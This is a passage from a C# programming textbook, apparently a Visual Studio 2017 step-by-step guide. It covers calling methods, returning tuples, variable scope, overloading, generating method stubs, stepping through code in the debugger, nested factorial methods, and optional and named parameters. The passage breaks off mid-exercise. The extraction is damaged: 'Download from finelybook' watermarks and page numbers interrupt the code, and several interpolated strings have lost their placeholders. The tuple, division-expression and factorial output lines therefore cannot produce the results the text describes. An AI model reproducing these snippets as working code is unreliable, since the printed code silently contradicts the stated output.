If you try to call addValues in some other way, you will probably not
succeed for the reasons described in the following examples:
Click here to view code image
addValues; // compile-time error, no parentheses
addValues(); // compile-time error, not enough arguments
addValues(39); // compile-time error, not enough arguments
addValues("39", "3"); // compile-time error, wrong types for
arguments
The addValues method returns an int value. You can use this int value
wherever an int value can be used. Consider these examples:
Click here to view code image
int result = addValues(39, 3); // on right-hand side of an
assignment
showResult(addValues(39, 3)); // as argument to another method
call
The following exercise continues with the Methods application. This time,
you will examine some method calls.
Examine method calls
1. Return to the Methods project. (This project is already open in Visual
Studio 2017 if you’re continuing from the previous exercise. If you are
not, open it from the \Microsoft Press\ VCSBS\Chapter 3\Methods
folder in your Documents folder.)
2. Display the code for MainPage.xaml.cs in the Code and Text Editor
Download from finelybook [email protected]
132
window.
3. Locate the calculateClick method, and look at the first two statements of
this method after the try statement and opening brace. (You will learn
about try statements in Chapter 6, “Managing errors and exceptions.”)
These statements look like this:
Click here to view code image
int leftHandSide = System.Int32.Parse(lhsOperand.Text);
int rightHandSide = System.Int32.Parse(rhsOperand.Text);
These two statements declare two int variables, called leftHandSide and
rightHandSide. Notice the way in which the variables are initialized. In
both cases, the Parse method of the System.Int32 struct is called.
(System is a namespace, and Int32 is the name of the struct in this
namespace. You will learn about structs in Chapter 9, “Creating value
types with enumerations and structures.”) You have seen this method
before; it takes a single string parameter and converts it to an int value.
These two lines of code take what the user has typed into the
lhsOperand and rhsOperand text box controls on the form and converts
it to int values.
4. Look at the fourth statement in the calculateClick method (after the if
statement and another opening brace):
Click here to view code image
calculatedValue = addValues(leftHandSide,
rightHandSide);
This statement calls the addValues method, passing the values of the
leftHandSide and rightHandSide variables as its arguments. The value
returned by the addValues method is stored in the calculatedValue
variable.
5. Look at the next statement:
showResult(calculatedValue);
This statement calls the showResult method passing the value in the
calculatedValue variable as its argument. The showResult method does
Download from finelybook [email protected]
133
not return a value.
6. In the Code and Text Editor window, find the showResult method you
looked at earlier.
The only statement of this method is this:
Click here to view code image
result.Text = answer.ToString();
Notice that the ToString method call uses parentheses even though there
are no arguments.
Tip You can call methods belonging to other objects by prefixing the
method with the name of the object. In the preceding example, the
expression answer.ToString() calls the method named ToString
belonging to the object called answer.
Returning multiple values from a method
There may be occasions when you want to return more than one value from a
method. For example, in the Methods project, you might want to combine the
effects of the divideValues and remainderValues operations into a single
method that returns the results of dividing the two operands together with the
remainder. You can achieve this by returning a tuple.
A tuple is simply a small collection of values (strictly speaking, a tuple
contains two values, but C# tuples can comprise bigger sets than this). You
indicate that a method returns a tuple by specifying a list of types as part of
the method definition; one type for each value returned. The return statement
in the method returns a list of values, as shown by the following example:
Click here to view code image
(int, int) returnMultipleValues(...)
{
Download from finelybook [email protected]
134
int val1;
int val2;
... // Calculate values for val1 and val2
return(val1, val2);
}
When you call the method, you provide an equivalent list of variables for
holding the results:
Click here to view code image
int retVal1, retVal2;
(retVal1, retVal2) = returnMultipleValues(...);
The following exercise illustrates how to create and call a method that
returns a tuple.
Note Tuples are a work in progress and are not yet fully integrated into
the build of C# included with Visual Studio 2017. You must install an
additional package if you want to use them. The steps for doing this are
covered in the exercise.
Create and call a method that returns a tuple
1. Return to the Methods project and display the code for
MainPage.xaml.cs in the Code and Text Editor window.
2. Locate the divideValues and remainderValues methods and delete them.
3. In place of these two methods, add the following method:
Click here to view code image
private (int, int) divide(int leftHandSide, int rightHandSide)
{
}
This method returns a tuple containing two values. These values will
contain the results of dividing the leftHandSide variable by the
rightHandSide variable, and also the remainder.
Download from finelybook [email protected]
135
4. In the body of the method, add the code shown below in bold. This code
performs the calculations and returns a tuple containing the results:
Click here to view code image
private (int, int) divide(int leftHandSide, int rightHandSide)
{
expression.Text = $" / ";
int division = leftHandSide / rightHandSide;
int remainder = leftHandSide % rightHandSide;
return (division, remainder);
}
Note Visual Studio will display red squiggles under the code that
defines the tuples. If you hover over this code you will see the
message “Predefined Type ‘System.ValueTuple’2’ is not defined
or imported.” This is fine. As explained before the exercise, you
have to add another package to the solution before Visual Studio
can use tuples. You will do this shortly.
5. Scroll up to the calculateClick method, and locate the following code
near the end of the method:
Click here to view code image
else if (division.IsChecked.HasValue &&
division.IsChecked.Value)
{
calculatedValue = divideValues(leftHandSide, rightHandSide);
showResult(calculatedValue);
}
else if (remainder.IsChecked.HasValue &&
remainder.IsChecked.Value)
{
calculatedValue = remainderValues(leftHandSide,
rightHandSide);
showResult(calculatedValue);
}
6. Delete this code; the divideValues and remainderValues methods no
longer exist and have been replaced with the single divide method.
Download from finelybook [email protected]
136
7. Add the following statements in place of the code you have just deleted:
Click here to view code image
else if (division.IsChecked.HasValue &&
division.IsChecked.Value)
{
int division, remainder;
(division, remainder) = divide(leftHandSide, rightHandSide);
result.Text = $" remainder ";
}
This code calls the divide method. The values returned are displayed in
the results text box.
8. In Solution Explorer, double-click the MainPage.xaml file to display the
form in the Design View window.
9. Click the % Remainder radio button, and then press Delete to remove it
from the form. This radio button is no longer required.
10. In the Tools menu above the Design View window, point to NuGet
Package Manager, and then click Manage NuGet Packages for Solution.
The NuGet package manager enables you to install additional packages
and libraries for a project. This is how you install support for tuples.
11. In the Manage Packages for Solution window, click Browse.
12. In the Search box, type ValueTuple.
13. In the list of packages that appears, click System.ValueTuple (this
should be the first item in the list).
14. In the right-hand pane, check the Project check box, and then click
Install.
15. In the Preview Changes dialog box, click OK to confirm that you want
to install the package.
16. When the package has been installed, on the Debug menu, click Start
Debugging to build and run the application.
17. In the Left Operand text box, enter 59; in the Right Operand text box,
enter 13; click Division, and then click Calculate.
Download from finelybook [email protected]
137
18. Verify that the Result text box contains the message “4 remainder 7”:
19. Return to Visual Studio. On the Debug menu, click Stop Debugging.
Applying scope
You create variables to hold values. You can create variables at various
points in your applications. For example, the calculateClick method in the
Methods project creates an int variable called calculatedValue and assigns it
an initial value of zero, like this:
Click here to view code image
private void calculateClick(object sender, RoutedEventArgs e)
{
int calculatedValue = 0;
...
}
This variable comes into existence at the point where it is defined, and
subsequent statements in the calculateClick method can then use this
variable. This is an important point: a variable can be used only after it has
Download from finelybook [email protected]
138
been created. When the method has finished, this variable disappears and
cannot be used elsewhere.
When a variable can be accessed at a particular location in a program, the
variable is said to be in scope at that location. The calculatedValue variable
has method scope; it can be accessed throughout the calculateClick method
but not outside that method. You can also define variables with different
scope; for example, you can define a variable outside a method but within a
class, and this variable can be accessed by any method within that class. Such
a variable is said to have class scope.
To put it another way, the scope of a variable is simply the region of the
program in which that variable is usable. Scope applies to methods as well as
variables. The scope of an identifier (of a variable or method) is linked to the
location of the declaration that introduces the identifier in the program, as
you will learn next.
Defining local scope
The opening and closing braces that form the body of a method define the
scope of the method. Any variables you declare inside the body of a method
are scoped to that method; they disappear when the method ends and can be
accessed only by code running in that method. These variables are called
local variables because they are local to the method in which they are
declared; they are not in scope in any other method.
The scope of local variables means that you cannot use them to share
information between methods. Consider this example:
Click here to view code image
class Example
{
void firstMethod()
{
int myVar;
...
}
void anotherMethod()
{
myVar = 42; // error - variable not in scope
...
}
Download from finelybook [email protected]
139
}
This code fails to compile because anotherMethod is trying to use the
variable myVar, which is not in scope. The variable myVar is available only
to statements in firstMethod that occur after the line of code that declares
myVar.
Defining class scope
The opening and closing braces that form the body of a class define the scope
of that class. Any variables you declare within the body of a class (but not
within a method) are scoped to that class. The proper C# term for a variable
defined by a class is field. As mentioned earlier, in contrast with local
variables, you can use fields to share information between methods. Here is
an example:
Click here to view code image
class Example
{
void firstMethod()
{
myField = 42; // ok
...
}
void anotherMethod()
{
myField++; // ok
...
}
int myField = 0;
}
The variable myField is defined in the class but outside the methods
firstMethod and anotherMethod. Therefore, myField has class scope and is
available for use by all methods in that class.
There is one other point to notice about this example. In a method, you
must declare a variable before you can use it. Fields are a little different. A
method can use a field before the statement that defines the field; the
compiler sorts out the details for you.
Download from finelybook [email protected]
140
Overloading methods
If two identifiers have the same name and are declared in the same scope,
they are said to be overloaded. Often an overloaded identifier is a bug that is
trapped as a compile-time error. For example, if you declare two local
variables with the same name in the same method, the compiler reports an
error. Similarly, if you declare two fields with the same name in the same
class or two identical methods in the same class, you also get a compile-time
error. This fact might seem hardly worth mentioning given that everything so
far has turned out to be a compile-time error. However, there is a way that
you can overload an identifier for a method that is both useful and important.
Consider the WriteLine method of the Console class. You have already
used this method for writing a string to the screen. However, when you type
WriteLine in the Code and Text Editor window when writing C# code, notice
that Microsoft IntelliSense gives you 19 different options! Each version of
the WriteLine method takes a different set of parameters. One version takes
no parameters and simply outputs a blank line. Another version takes a bool
parameter and outputs a string representation of its value (True or False). Yet
another implementation takes a decimal parameter and outputs it as a string,
and so on. At compile time, the compiler looks at the types of the arguments
you are passing in and then arranges for your application to call the version
of the method that has a matching set of parameters. Here is an example:
Click here to view code image
static void Main()
{
Console.WriteLine("The answer is ");
Console.WriteLine(42);
}
Overloading is primarily useful when you need to perform the same
operation on different data types or varying groups of information. You can
overload a method when the different implementations have different sets of
parameters; that is, when they have the same name but a different number of
parameters or when the types of the parameters differ. When you call a
method, you supply a comma-separated list of arguments, and the number
and type of the arguments are used by the compiler to select one of the
overloaded methods. However, keep in mind that although you can overload
the parameters of a method, you can’t overload the return type of a method.
Download from finelybook [email protected]
141
In other words, you can’t declare two methods with the same name that differ
only in their return type. (The compiler is clever, but not that clever.)
Writing methods
In the following exercises, you’ll create a method that calculates how much a
consultant would charge for a given number of consultancy days at a fixed
daily rate. You will start by developing the logic for the application and then
use the Generate Method Stub Wizard to help you write the methods that are
used by this logic. Next, you’ll run these methods in a console application to
get a feel for the program. Finally, you’ll use the Visual Studio 2017
debugger to step into and out of the method calls as they run.
Develop the logic for the application
1. Using Visual Studio 2017, open the DailyRate project, which is in the
\Microsoft Press\VCSBS\Chapter 3\DailyRate folder in your Documents
folder.
2. In Solution Explorer, in the DailyRate project, double-click the file
Program.cs to display the code for the program in the Code and Text
Editor window.
This program is simply a test harness for you to try out your code. When
the application starts running, it calls the run method. You add to the run
method the code that you want to try. (The way in which the method is
called requires an understanding of classes, which you look at in
Chapter 7.)
3. Add the following statements shown in bold to the body of the run
method, between the opening and closing braces:
Click here to view code image
void run()
{
double dailyRate = readDouble("Enter your daily rate: ");
int noOfDays = readInt("Enter the number of days: ");
writeFee(calculateFee(dailyRate, noOfDays));
}
The block of code you have just added to the run method calls the
Download from finelybook [email protected]
142
readDouble method (which you will write shortly) to ask the user for the
daily rate for the consultant. The next statement calls the readInt method
(which you will also write) to obtain the number of days. Finally, the
writeFee method (to be written) is called to display the results on the
screen. Notice that the value passed to writeFee is the value returned by
the calculateFee method (the last one you will need to write), which
takes the daily rate and the number of days and calculates the total fee
payable.
Note You have not yet written the readDouble, readInt, writeFee, and
calculateFee methods, so IntelliSense does not display these methods
when you type this code. Do not try to build the application yet, because
it will fail.
Write the methods by using the Generate Method Stub Wizard
1. In the Code and Text Editor window, in the run method, right-click the
readDouble method call.
A shortcut menu appears that contains useful commands for generating
and editing code, as shown here:
Download from finelybook [email protected]
143
2. On the shortcut menu, click Quick Actions and Refactorings.
Visual Studio verifies that the readDouble method does not exist and
displays a wizard that enables you to generate a stub for this method.
Visual Studio examines the call to the readDouble method, ascertains
the type of its parameters and return value, and suggests a default
implementation, as shown in the following image:
Download from finelybook [email protected]
144
3. Click Generate Method ‘Program.readDouble’. Visual Studio adds the
following method to your code:
Click here to view code image
private double readDouble(string v)
{
throw new NotImplementedException();
}
The new method is created with the private qualifier, which is described
in Chapter 7. The body of the method currently just throws a
NotImplementedException exception. (Exceptions are described in
Chapter 6.) You replace the body with your own code in the next step.
4. Delete the throw new NotImplementedException(); statement from the
readDouble method and replace it with the following lines of code
shown in bold:
Click here to view code image
Download from finelybook [email protected]
145
private double readDouble(string v)
{
Console.Write(v);
string line = Console.ReadLine();
return double.Parse(line);
}
This block of code displays the string in variable v to the screen. This
variable is the string parameter passed in when the method is called; it
contains the message prompting the user to type in the daily rate.
Note The Console.Write method is similar to the
Console.WriteLine statement that you have used in earlier
exercises, except that it does not output a newline character after
the message.
The user types a value, which is read into a string using the ReadLine
method and converted to a double using the double.Parse method. The
result is passed back as the return value of the method call.
Note The ReadLine method is the companion method to
WriteLine; it reads user input from the keyboard, finishing when
the user presses the Enter key. The text typed by the user is passed
back as the return value. The text is returned as a string value.
5. In the run method, right-click the call to the readInt method, click Quick
Actions and Refactorings, and then click Generate Method
‘Program.readInt.’
The readInt method is generated like this:
Click here to view code image
Download from finelybook [email protected]
146
private int readInt(string v)
{
throw new NotImplementedException();
}
6. Replace the throw new NotImplementedException(); statement in the
body of the readInt method with the following code shown in bold:
Click here to view code image
private int readInt(string v)
{
Console.Write(v);
string line = Console.ReadLine();
return int.Parse(line);
}
This block of code is similar to the code for the readDouble method.
The only difference is that the method returns an int value, so the string
typed by the user is converted to a number using the int.Parse method.
7. Right-click the call to the calculateFee method in the run method, click
Quick Actions and Refactorings, and then click Generate Method
‘Program.calculateFee.’
The calculateFee method is generated like this:
Click here to view code image
private object calculateFee(double dailyRate, int noOfDays)
{
throw new NotImplementedException();
}
Notice in this case that Visual Studio uses the names of the arguments
passed in to generate names for the parameters. (You can, of course,
change the parameter names if they are not suitable.) What is more
intriguing is the type returned by the method, which is object. Visual
Studio is unable to determine exactly which type of value should be
returned by the method from the context in which it is called. The object
type just means a “thing,” and you should change it to the type you
require when you add the code to the method. Chapter 7 covers the
object type in greater detail.
8. Change the definition of the calculateFee method so that it returns a
double, as shown in bold type here:
Download from finelybook [email protected]
147
Click here to view code image
private double calculateFee(double dailyRate, int noOfDays)
{
throw new NotImplementedException();
}
9. Replace the body of the calculateFee method and change it to an
expression-bodied method with the following expression shown in bold;
remove the curly braces and use => to indicate the expression that
defines the body of the method. This statement calculates the fee
payable by multiplying the two parameters together:
Click here to view code image
private double calculateFee(double dailyRate, int noOfDays) =>
dailyRate * noOfDays;
10. Right-click the call to the writeFee method in the run method, click
Quick Actions and Refactorings, and then click Generate Method
‘Program.writeFee.’
Notice that Visual Studio uses the definition of the writeFee method to
work out that its parameter should be a double. Also, the method call
does not use a return value, so the type of the method is void:
Click here to view code image
private void writeFee(double v)
{
...
}
Tip If you feel sufficiently comfortable with the syntax, you can
also write methods by typing them directly into the Code and Text
Editor window. You do not always have to use the Generate menu
option.
11. Replace the code in the body of the writeFee method with the following
statement, which calculates the fee and adds a 10 percent commission
Download from finelybook [email protected]
148
before displaying the result. Again, notice that this is now an expression-
bodied method:
Click here to view code image
private void writeFee(double v) => Console.WriteLine($"The
consultant's fee is: {v * 1.1}");
12. On the Build menu, click Build Solution.
Refactoring code
A very useful feature of Visual Studio 2017 is the ability to refactor code.
Occasionally, you will find yourself writing the same (or similar) code in
more than one place in an application. When this occurs, highlight and right-
click the block of code you have just typed, click Quick Actions and
Refactoring, and then click Extract Method. The selected code is moved to a
new method named NewMethod. The Extract Method Wizard is also able to
determine whether the method should take any parameters and return a value.
After the method has been generated, you should change its name (by
overtyping) to something meaningful and also change the statement that has
been generated to call this method with the new name.
Test the program
1. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds the program and then runs it. A console
window appears.
2. At the Enter Your Daily Rate prompt, type 525 and then press Enter.
3. At the Enter The Number of Days prompt, type 17 and then press Enter.
The program writes the following message to the console window:
The consultant's fee is: 9817.5
4. Press the Enter key to close the application and return to Visual Studio
2017.
In the next exercise, you’ll use the Visual Studio 2017 debugger to run
your program in slow motion. You’ll see when each method is called (which
Download from finelybook [email protected]
149
is referred to as stepping into the method) and then see how each return
statement transfers control back to the caller (also known as stepping out of
the method). While you are stepping into and out of methods, you can use the
tools on the Debug toolbar. However, the same commands are also available
on the Debug menu when an application is running in debug mode.
Step through the methods by using the Visual Studio 2017 debugger
1. In the Code and Text Editor window, find the run method.
2. Move the cursor to the first statement in the run method:
Click here to view code image
double dailyRate = readDouble("Enter your daily
rate: ");
3. Right-click anywhere on this line, and then click Run To Cursor.
The program starts, runs until it reaches the first statement in the run
method, and then pauses. A yellow arrow in the left margin of the Code
and Text Editor window indicates the current statement, and the
statement itself is highlighted with a yellow background.
4. On the View menu, point to Toolbars, and then ensure that the Debug
toolbar is selected.
Download from finelybook [email protected]
150
If it was not already visible, the Debug toolbar opens. It might appear
docked with the other toolbars. If you cannot see the toolbar, try using
the Toolbars command on the View menu to hide it and look to see
which buttons disappear. Then, display the toolbar again. The Debug
toolbar looks like this:
5. On the Debug toolbar, click the Step Into button. (This is the sixth
button from the left on the Debug toolbar.)
This action causes the debugger to step into the method being called.
The yellow cursor jumps to the opening brace at the start of the
readDouble method.
6. Click Step Into again to advance the cursor to the first statement:
Console.Write(v);
Tip You can also press F11 instead of repeatedly clicking Step
Into on the Debug toolbar.
7. On the Debug toolbar, click Step Over. (This is the seventh button from
the left.)
This action causes the method to execute the next statement without
debugging it (stepping into it). This action is useful primarily if the
statement calls a method, but you don’t want to step through every
statement in that method. The yellow cursor moves to the second
statement of the method, and the program displays the Enter Your Daily
Rate prompt in a console window before returning to Visual Studio
2017. (The console window might be hidden behind Visual Studio.)
Download from finelybook [email protected]
151
Tip You can also press F10 instead of Step Over on the Debug
toolbar.
8. On the Debug toolbar, click Step Over again.
This time, the yellow cursor disappears, and the console window gets
the focus because the program is executing the Console.ReadLine
method and is waiting for you to type something.
9. Type 525 in the console window, and then press Enter.
Control returns to Visual Studio 2017. The yellow cursor appears on the
third line of the method.
10. Hover the mouse over the reference to the line variable on either the
second or third line of the method. (It doesn’t matter which.)
A ScreenTip appears, displaying the current value of the line variable
(“525”). You can use this feature to ensure that a variable has been set to
an expected value while you step through methods.
11. On the Debug toolbar, click Step Out. (This is the eighth button from the
left.)
This action causes the current method to continue to run uninterrupted to
its end. The readDouble method finishes and the yellow cursor is placed
back at the first statement of the run method. This statement has now
finished running.
Download from finelybook [email protected]
152
Tip You can also press Shift+F11 instead of clicking Step Out on
the Debug toolbar.
12. On the Debug toolbar, click Step Into.
The yellow cursor moves to the second statement in the run method:
Click here to view code image
int noOfDays = readInt("Enter the number of
days: ");
13. On the Debug toolbar, click Step Over.
This time, you have chosen to run the method without stepping through
it. The console window appears again, prompting you for the number of
days.
14. In the console window, type 17 and then press Enter.
Control returns to Visual Studio 2017 (you might need to bring Visual
Studio to the foreground). The yellow cursor moves to the third
statement of the run method:
Click here to view code image
writeFee(calculateFee(dailyRate, noOfDays));
15. On the Debug toolbar, click Step Into.
The yellow cursor jumps to the expression that defines the body of the
calculateFee method. This method is called first, before writeFee,
because the value returned by this method is used as the parameter to
writeFee.
16. On the Debug toolbar, click Step Out.
The calculateFee method call completes, and the yellow cursor jumps
back to the third statement of the run method.
Download from finelybook [email protected]
153
17. On the Debug toolbar, click Step Into again.
This time, the yellow cursor jumps to the statement that defines the body
of the writeFee method.
18. Place the mouse over the v parameter in the method definition.
The value of v, 8925, is displayed in a ScreenTip.
19. On the Debug toolbar, click Step Out.
The message “The consultant’s fee is: 9817.5” is displayed in the
console window. (You might need to bring the console window to the
foreground to display it if it is hidden behind Visual Studio 2017.) The
yellow cursor returns to the third statement in the run method.
20. On the toolbar, click Continue to cause the program to continue running
without stopping at each subsequent statement.
Tip If the Continue button is not visible, click the Add Or Remove
Buttons drop-down menu that appears at the end of the Debug
toolbar, and then select Continue. The Continue button should now
appear. Alternatively, you can press F5 to continue running the
application without debugging.
The application completes and finishes running. Notice that the Debug
toolbar disappears when the application finishes; by default, the Debug
toolbar is displayed only when you are running an application in debug
mode.
Nesting methods
Sometimes you want to break a large method down into smaller pieces. You
can implement each piece as a helper method in its own right; this helps you
to test methods that perform complex processes and to verify that each part of
Download from finelybook [email protected]
154
the large method functions as expected before bringing them together. It can
also aid readability and make a large method easier to maintain.
Note The terms large method and helper method are not official
vocabulary in C#. I have used them in this discussion to distinguish
between a method that is broken down into smaller pieces (the large
method) and the methods that implement these smaller pieces (the
helper methods).
By default, methods (large and helper) are accessible across the class in
which they are defined, and can be invoked from any other methods in that
class. In the case of helper methods that are only utilized by one large
method, it can make sense to keep these methods local to the large method
that runs them. This approach can ensure that a helper method designed to
operate in a given context is not used accidentally by another method for
which it was not designed. This is also good practice for implementing
encapsulation; the inner workings of a large method, including the helper
methods that it invokes, can be kept separate from other methods. This
practice reduces any dependencies between large methods; you can safely
change the implementation of a large method and the helper methods that it
invokes without accidentally impacting other elements of your application.
You can create helper methods by nesting them inside that large method
that uses them, as shown in the next exercise. This exercise calculates
factorials. You can use factorials to work out how many ways you can
arrange a given number of items. The factorial of a positive integer, n, is
defined in a recursive manner as n * factorial (n – 1), where the factorial of 1
is 1. For example, the factorial of 3 is 3 * factorial(2), which is in turn 2 *
factorial(1), which is 1. This calculation evaluates as 3 * 2 * 1, or 6. If you
have 3 items in a set, you can arrange them in 6 different ways. Similarly, if
you have 4 items you can arrange them in 24 different ways (4 * factorial(3)),
and you can arrange 5 items in 120 different ways (5 * factorial(4)).
Calculate factorials
Download from finelybook [email protected]
155
1. Start Visual Studio 2017 if it is not already running.
2. Open the Factorial solution, which is in the \Microsoft
Press\VCSBS\Chapter 3\Factorial folder in your Documents folder.
3. In Solution Explorer, in the Factorials project, double-click the file
Program.cs to display the code for the program in the Code and Text
Editor window.
4. Add the following statements shown in bold to the body of the run
method, between the opening and closing braces:
Click here to view code image
void run()
{
Console.Write("Please enter a positive integer: ");
string inputValue = Console.ReadLine();
long factorialValue = CalculateFactorial(inputValue);
Console.WriteLine($"Factorial() is ");
}
This code prompts the user to enter a numeric value, and then calls the
CalculateFactorial function (which you will write next) with this value,
before displaying the result.
5. Add a new method named CalculateFactorial below the run method.
This method should take a string parameter named input, and return a
long integer value, as follows:
Click here to view code image
long CalculateFactorial(string input)
{
}
6. In the CalculateFactorial method, after the initial opening brace, add the
statement shown below in bold:
Click here to view code image
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
}
This statement converts the string value passed in as the parameter to an
integer (the code does not currently check to make sure that the user has
Download from finelybook [email protected]
156
entered a valid integer; you will see how to do this in Chapter 6,
“Managing errors and exceptions”).
7. Add a nested method named factorial to the CalculateFactorial
function. The factorial method should take an int value and return a
long. You will use this method to actually calculate the factorial of the
input parameter:
Click here to view code image
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
long factorial (int dataValue)
{
}
}
8. In the body of the factorial method, add the statements shown below in
bold. This code calculates the factorial of the input parameter using the
recursive algorithm described earlier:
Click here to view code image
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
long factorial (int dataValue)
{
if (dataValue == 1)
{
return 1;
}
else
{
return dataValue * factorial(dataValue - 1);
}
}
}
9. In the CalculateFactorial method, call the factorial method using the
integer value provided as input and return the result:
Click here to view code image
long CalculateFactorial(string input)
{
int inputValue = int.Parse(input);
long factorial (int dataValue)
Download from finelybook [email protected]
157
{
if (dataValue == 1)
{
return 1;
}
else
{
return dataValue * factorial(dataValue - 1);
}
}
long factorialValue = factorial(inputValue);
return factorialValue;
}
10. On the Debug menu, click Start Without Debugging.
Visual Studio 2017 builds the program and then runs it. A console
window appears.
11. At the Please Enter a Positive Integer prompt, type 4, and then press
Enter.
The program writes the following message to the console window:
Factorial(4) is 24
12. Press the Enter key to close the application and return to Visual Studio
2017.
13. Run the application and provide the value 5 when prompted. This time,
the application should display the following message:
Factorial(5) is 120
14. Feel free to experiment with other values. Note that if you enter an input
value that is too large (try 60, for example), the result will exceed that of
the range that can be stored in a long integer, and you will get an
incorrect result; most likely a negative number generated as a result of
numeric overflow. You will learn more about how to handle this
eventuality by using checked exceptions in Chapter 6.
Using optional parameters and named arguments
Download from finelybook [email protected]
158
You have seen that by defining overloaded methods, you can implement
different versions of a method that take different parameters. When you build
an application that uses overloaded methods, the compiler determines which
specific instances of each method it should use to satisfy each method call.
This is a common feature of many object-oriented languages, not just C#.
However, developers can use other languages and technologies for
building Windows applications and components that do not follow these
rules. A key feature of C# and other languages designed for the .NET
Framework is the ability to interoperate with applications and components
written with other technologies. One of the principal technologies that
underpins many Windows applications and services running outside the .NET
Framework is the Component Object Model (COM). In fact, the common
language runtime (CLR) used by the .NET Framework is also heavily
dependent on COM, as is the Windows Runtime of Windows 10. COM does
not support overloaded methods; instead, it uses methods that can take
optional parameters. To make it easier to incorporate COM libraries and
components into a C# solution, C# also supports optional parameters.
Optional parameters are also useful in other situations. They provide a
compact and simple solution when it is not possible to use overloading
because the types of the parameters do not vary sufficiently to enable the
compiler to distinguish between implementations. For example, consider the
following method:
Click here to view code image
public void DoWorkWithData(int intData, float floatData, int
moreIntData)
{
...
}
The DoWorkWithData method takes three parameters: two ints and a
float. Now suppose that you want to provide an implementation of
DoWorkWithData that takes only two parameters: intData and floatData.
You can overload the method like this:
Click here to view code image
public void DoWorkWithData(int intData, float floatData)
{
...
Download from finelybook [email protected]
159
}
If you write a statement that calls the DoWorkWithData method, you can
provide either two or three parameters of the appropriate types, and the
compiler uses the type information to determine which overload to call:
Click here to view code image
int arg1 = 99;
float arg2 = 100.0F;
int arg3 = 101;
DoWorkWithData(arg1, arg2, arg3); // Call overload with three
parameters
DoWorkWithData(arg1, arg2); // Call overload with two
parameters
However, suppose that you want to implement two additional versions of
DoWorkWithData that take only the first parameter and the third parameter.
You might be tempted to try this:
Click here to view code image
public void DoWorkWithData(int intData)
{
...
}
public void DoWorkWithData(int moreIntData)
{
...
}
The issue here is that these two overloads appear identical to the compiler.
Your code will fail to compile and will instead generate the error “Type
‘typename’ already defines a member called ‘DoWorkWithData’ with the
same parameter types.” To understand why this is so, think what would
happen if this code were legal. Consider the following statements:
int arg1 = 99;
int arg3 = 101;
DoWorkWithData(arg1);
DoWorkWithData(arg3);
Which overload or overloads would the calls to DoWorkWithData invoke?
Using optional parameters and named arguments can help to solve this
problem.
Download from finelybook [email protected]
160
Defining optional parameters
You specify that a parameter is optional when you define a method by
providing a default value for the parameter. You indicate a default value by
using the assignment operator. In the optMethod method shown next, the first
parameter is mandatory because it does not specify a default value, but the
second and third parameters are optional:
Click here to view code image
void optMethod(int first, double second = 0.0, string third =
"Hello") {
...
}
You must specify all mandatory parameters before any optional
parameters.
You can call a method that takes optional parameters in the same way that
you call any other method: you specify the method name and provide any
necessary arguments. The difference with methods that take optional
parameters is that you can omit the corresponding arguments and the method
will use the default value when it runs. In the example that follows, the first
call to the optMethod method provides values for all three parameters. The
second call specifies only two arguments, and these values are applied to the
first and second parameters. The third parameter receives the default value of
“Hello” when the method runs.
Click here to view code image
optMethod(99, 123.45, "World"); // Arguments provided for all three
parameters
optMethod(100, 54.321); // Arguments provided for first two
parameters only
Passing named arguments
By default, C# uses the position of each argument in a method call to
determine to which parameter the argument applies. Hence, the second
example of the OptMethod method shown in the previous section passes the
two arguments to the first and second parameters in the method because this
is the order in which they occur in the method declaration. With C#, you can
also specify parameters by name. This feature lets you pass the arguments in
Download from finelybook [email protected]
161
a different sequence. To pass an argument as a named parameter, you specify
the name of the parameter, followed by a colon and the value to use. The
following examples perform the same function as those shown in the
previous section, except that the parameters are specified by name:
Click here to view code image
optMethod(first : 99, second : 123.45, third : "World");
optMethod(first : 100, second : 54.321);
Named arguments give you the ability to pass arguments in any order.
You can rewrite the code that calls the optMethod method such as shown
here:
Click here to view code image
optMethod(third : "World", second : 123.45, first : 99);
optMethod(second : 54.321, first : 100);
optMethod(third : "World", second : 123.45, first : 99);
optMethod(second : 54.321, first : 100);
This feature also makes it possible for you to omit arguments. For
example, you can call the optMethod method and specify values for the first
and third parameters only and use the default value for the second parameter,
like this:
Click here to view code image
optMethod(first : 99, third : "World");
Additionally, you can mix positional and named arguments. However, if
you use this technique, you must specify all the positional arguments before
the first named argument.
Click here to view code image
optMethod(99, third : "World"); // First argument is positional
Resolving ambiguities with optional parameters and
named arguments
Using optional parameters and named arguments can result in some possible
ambiguities in your code. You need to understand how the compiler resolves
these ambiguities; otherwise, you might find your applications behaving in
unexpected ways. Suppose that you define the optMethod method as an
Download from finelybook [email protected]
162
overloaded method, as shown in the following example:
Click here to view code image
void optMethod(int first, double second = 0.0, string third =
"Hello")
{
...
}
void optMethod(int first, double second = 1.0, string third =
"Goodbye", int fourth = 100 )
{
...
}
This is perfectly legal C# code that follows the rules for overloaded
methods. The compiler can distinguish between the methods because they
have different parameter lists. However, as demonstraeted in the following
example, a problem can arise if you attempt to call the optMethod method
and omit some of the arguments corresponding to one or more of the optional
parameters:
optMethod(1, 2.5, "World");
Again, this is perfectly legal code, but which version of the optMethod
method does it run? The answer is the version that most closely matches the
method call, so the code invokes the method that takes three parameters and
not the version that takes four. That makes good sense, so consider this one:
optMethod(1, fourth : 101);
In this code, the call to optMethod omits arguments for the second and
third parameters, but it specifies the fourth parameter by name. Only one
version of optMethod matches this call, so this is not a problem. This next
example will get you thinking, though:
optMethod(1, 2.5);
This time, neither version of the optMethod method exactly matches the
list of arguments provided. Both versions of the optMethod method have
optional parameters for the second, third, and fourth arguments. So, does this
statement call the version of optMethod that takes three parameters and use
the default value for the third parameter, or does it call the version of
optMethod that takes four parameters and use the default value for the third
Download from finelybook [email protected]
163
and fourth parameters? The answer is that it does neither. This is an
unresolvable ambiguity, and the compiler does not let you compile the
application. The same situation arises with the same result if you try to call
the optMethod method, as shown in any of the following statements:
Click here to view code image
optMethod(1, third : "World");
optMethod(1);
optMethod(second : 2.5, first : 1);
In the final exercise in this chapter, you will revisit the DailyRate project
and practice implementing methods that take optional parameters and calling
them by using named arguments. You will also test common examples of
how the C# compiler resolves method calls that involve optional parameters
and named arguments.
Define and call a method that takes optional parameters
1. Using Visual Studio 2017, open the DailyRate solution, which is in the
\Microsoft Press\VCSBS\Chapter 3\DailyRate Using Optional
Parameters folder in your Documents folder.
2. In Solution Explorer, in the DailyRate project, double-click the file
Program.cs to display the code for the program in the Code and Text
Editor window.
This version of the application is empty apart from the Main method and
the skeleton version of the run method.
3. In the Program class, after the run method, add the calculateFee method
